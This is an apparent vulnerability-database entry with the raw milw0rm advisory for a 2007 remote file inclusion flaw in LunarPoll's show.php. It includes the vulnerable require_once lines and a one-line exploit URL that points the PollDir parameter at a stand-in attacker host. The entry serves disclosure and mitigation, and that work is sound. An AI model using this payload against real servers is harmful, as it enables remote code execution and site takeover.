LunarPoll Script Remote File Inclusion Vulnerability

vendor:

LunarPoll Script

by:

Unknown

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: LunarPoll Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

LunarPoll Script Remote File Inclusion Vulnerability

The LunarPoll script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a malicious URL in the 'PollDir' parameter of the 'show.php' script, leading to the inclusion of arbitrary remote files.

Mitigation:

The vendor should release a patch to fix the remote file inclusion vulnerability. In the meantime, users are advised to restrict access to the 'show.php' script and sanitize user input to prevent malicious URL injections.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit:  show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-01-12]